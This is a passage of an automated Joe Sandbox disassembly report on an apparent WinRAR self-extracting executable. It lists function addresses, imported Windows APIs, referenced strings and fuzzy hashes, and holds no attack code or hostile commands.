Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction ID: a2c4f69d78f72b03a4780760d95daba72986c00bc20fb3010c655cbe69359f48
Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction Fuzzy Hash: E7F0447571C3A5DBDBA5BF29A442A297790F708385FC48039EA8983A44D67C94608F14

Function 00007FF741EC3354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction ID: 01bb027abb62f4fb24b0284bb0775104213469ba3e081cbd19a69ea658fb4030
Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction Fuzzy Hash: 4AA0026994CC63D0E756BB14EE604B0A330FB51302BD40031F02D411B4EFBCB402C320

Function 00007FF741E9D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D964

Strings

::$BITMAP, xrefs: 00007FF741E9D807
::$DATA, xrefs: 00007FF741E9D812
::$ATTRIBUTE_LIST, xrefs: 00007FF741E9D7FC
::$OBJECT_ID, xrefs: 00007FF741E9D880
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF741E9D86A
::$INDEX_ALLOCATION, xrefs: 00007FF741E9D83E
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF741E9D85F
::$REPARSE_POINT, xrefs: 00007FF741E9D88B
::$FILE_NAME, xrefs: 00007FF741E9D833
::$EA_INFORMATION, xrefs: 00007FF741E9D828
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF741E9D875
::$INDEX_ROOT, xrefs: 00007FF741E9D854
::$EA, xrefs: 00007FF741E9D81D
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF741E9D849

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
Instruction ID: 48d90e65904104a96cf571714183d241c5eda5595f12964e68ed5faa3d2f52f2
Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
Instruction Fuzzy Hash: DF41083AB59B22D8EB02BB65E8403E873A5FB08799F840136DA5C03769EFB8D155C350

Function 00007FF741EC2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF741EC2A26
GetModuleHandleW.KERNEL32 ref: 00007FF741EC2A33
GetModuleHandleW.KERNEL32 ref: 00007FF741EC2A48
GetProcAddress.KERNEL32 ref: 00007FF741EC2A60
GetProcAddress.KERNEL32 ref: 00007FF741EC2A73
CreateEventW.KERNEL32 ref: 00007FF741EC2A9F
DeleteCriticalSection.KERNEL32 ref: 00007FF741EC2AEB
CloseHandle.KERNEL32 ref: 00007FF741EC2AFD

Strings

kernel32.dll, xrefs: 00007FF741EC2A41
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF741EC2A2C
WakeAllConditionVariable, xrefs: 00007FF741EC2A66
SleepConditionVariableCS, xrefs: 00007FF741EC2A56

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction ID: ba55dfebb91cd4515abba8f3d94ff7971f15d85d931703c9af7dd094cec8548a
Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction Fuzzy Hash: 50211D6CF4DA27D2FB57BB65EC54574A3A0BF54782FC80034C91E026A1EFBCA44AC220

Function 00007FF741EA6A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70A6

Part of subcall function 00007FF741E92004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF741E9200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA70DC

Strings

\\?\, xrefs: 00007FF741EA6A57, 00007FF741EA6A66
UNC, xrefs: 00007FF741EA6BBF
DXGIDebug.dll, xrefs: 00007FF741EA6A18

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
Instruction ID: 6694ccb95f6c8f14326471d2614de6bb1d6b31550672d86493cbbea6072ba9c5
Opcode Fuzzy Hash: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
Instruction Fuzzy Hash: DC12CD2AB1CA52C0EB11FB64D4400ADA372FB86BD9F904131DA6D07AE9DFBDD585C350

Function 00007FF741EBA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741E9129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBA72F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBA735
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBA73B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBA741
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBA747
EndDialog.USER32 ref: 00007FF741EBA7BA

Strings

GETPASSWORD1, xrefs: 00007FF741EBA773
Software\WinRAR SFX, xrefs: 00007FF741EBA52B, 00007FF741EBA53A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
Instruction ID: 513089bf2e50cfa10c450e6cdaa147d44d78cc8634dec57ceeb3fc2a55d94676
Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
Instruction Fuzzy Hash: EAB1CD66F1D762C5FF02FB64D4442BCA362BB85795F804235DA2D26AD9EFBCA045C310

Function 00007FF741EB6E80 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF741EB7E9B), ref: 00007FF741EB7080
CreateStreamOnHGlobal.COMBASE ref: 00007FF741EB70B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB7181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB7187

Strings

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF741EB6ED5, 00007FF741EB6EE4
<html>, xrefs: 00007FF741EB6F13
</html>, xrefs: 00007FF741EB6F72, 00007FF741EB6F81
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF741EB6F2C, 00007FF741EB6F3B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2868844859-1533471033
Opcode ID: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
Instruction ID: 04c0b9af6db7276583f8d38043cf438206c18957172d638c8348d693a7cb24d6
Opcode Fuzzy Hash: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
Instruction Fuzzy Hash: 1981A066F1C612C5EB02FBA5D8402FCA372BB49785F844235DE1D16ADAEFB8D546C320

Function 00007FF741ECE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECE7CD

Strings

nan(ind), xrefs: 00007FF741ECE706
inf, xrefs: 00007FF741ECE6D6
NAN(IND), xrefs: 00007FF741ECE6FB
NAN(SNAN), xrefs: 00007FF741ECE6E5
INF, xrefs: 00007FF741ECE6C3
NAN, xrefs: 00007FF741ECE6B1
nan(snan), xrefs: 00007FF741ECE6F0
nan, xrefs: 00007FF741ECE6B8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: 796a290d27aec585068f63c67c8af1ee031d585dba9cf211609cff2d56d21b2b
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: 7A41BE3AB09B55C9E702FB25E8417A977A4FB14398F84413AEE5C03B54EF78D025C354

Function 00007FF741EBF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF741EBF3CF
GetClassNameW.USER32 ref: 00007FF741EBF3FC
GetWindowLongPtrW.USER32 ref: 00007FF741EBF41D
SendMessageW.USER32 ref: 00007FF741EBF437
GetObjectW.GDI32 ref: 00007FF741EBF452
SendMessageW.USER32 ref: 00007FF741EBF487
DeleteObject.GDI32 ref: 00007FF741EBF490
GetWindow.USER32 ref: 00007FF741EBF49E

Strings

STATIC, xrefs: 00007FF741EBF402

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassDeleteLongName
String ID: STATIC
API String ID: 2845197485-1882779555
Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction ID: 60c80f65225f214c20766c425eadda427d0840a8cddd6da106815c707cae195e
Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction Fuzzy Hash: 0031C439B0C662C6FB62FB11A5547B9A391BF88B82FC10130DD4D07B56DEBCE4028760

Function 00007FF741EBAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF741EBAEAE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ItemTextWindow
String ID: LICENSEDLG
API String ID: 2478532303-2177901306
Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
Instruction ID: 8ddf5ecb4e1773df20e95d725242809e16f1f7ca75cb04de13f4adace261babf
Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
Instruction Fuzzy Hash: 3C419D29F0C622C2FB56FB11A814779A3A1BB84B82FC44134DD0E03B91CFBDE5868324

Function 00007FF741EAB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF741EABA12
GetProcAddress.KERNEL32 ref: 00007FF741EABA2D
GetCurrentProcessId.KERNEL32 ref: 00007FF741EABACA

Part of subcall function 00007FF741EADFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF741EADDDF

Strings

CryptProtectMemory, xrefs: 00007FF741EABA08
CryptProtectMemory failed, xrefs: 00007FF741EABA80
CryptUnprotectMemory failed, xrefs: 00007FF741EABAC1
Crypt32.dll, xrefs: 00007FF741EAB9F0
CryptUnprotectMemory, xrefs: 00007FF741EABA1F

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction ID: 94ef7f34be6a11e964a79c54a3b2c02fb3303b86220fb14806c57ef65884b81b
Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction Fuzzy Hash: D1314928E0DA27D0EB16BB12A860575A7A1BF45B93FC94135CE5E033A4DEBCE5418328

Function 00007FF741EA4F38 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 158comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE ref: 00007FF741EA4F69

Part of subcall function 00007FF741EA4E24: SysAllocString.OLEAUT32 ref: 00007FF741EA4E5F

VariantClear.OLEAUT32 ref: 00007FF741EA5125

Strings

Windows 10, xrefs: 00007FF741EA510A
WQL, xrefs: 00007FF741EA502A
Name, xrefs: 00007FF741EA50F9
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF741EA5017
ROOT\CIMV2, xrefs: 00007FF741EA4F7B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AllocClearCreateInstanceStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 462963442-3505469590
Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction ID: 257dc024a73ac37c34a36b8ca3af980b44f8f33c47491d5c855d7f651754c272
Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction Fuzzy Hash: B8714C3AA18A26C5EB11FF25D8805ADB7B0FF84B99B845136EA4D43B68CF78D545C310

Function 00007FF741EC57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF741EC598A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741EC5CAD
abort.LIBCMT ref: 00007FF741EC5CE1

Strings

csm, xrefs: 00007FF741EC58D1
csm, xrefs: 00007FF741EC5933
csm, xrefs: 00007FF741EC59B1

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction ID: 24a73eea9c3a6b5edea2e916715efefc4456499e4533817d208a8596739d3aa3
Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction Fuzzy Hash: 36E1B176A0C7A2CAE716BB24D8803AEB7A0FF45749F940235EA8D47755EF78E481C710

Function 00007FF741EC72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC7371
GetLastError.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC737F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73A9
FreeLibrary.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73EF
GetProcAddress.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73FB

Strings

api-ms-, xrefs: 00007FF741EC7391

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction ID: 229fa94840f60d59dc57aaaba026ef103b6a180b1fb4bea50965094887970214
Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction Fuzzy Hash: 3631C129A1E662C1EF13BB1AAC00575A295FF45BA1F994535DD1D47380EFBCE041C330

Function 00007FF741EC1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC162B
GetProcAddress.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC1648
GetProcAddress.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC1664

Strings

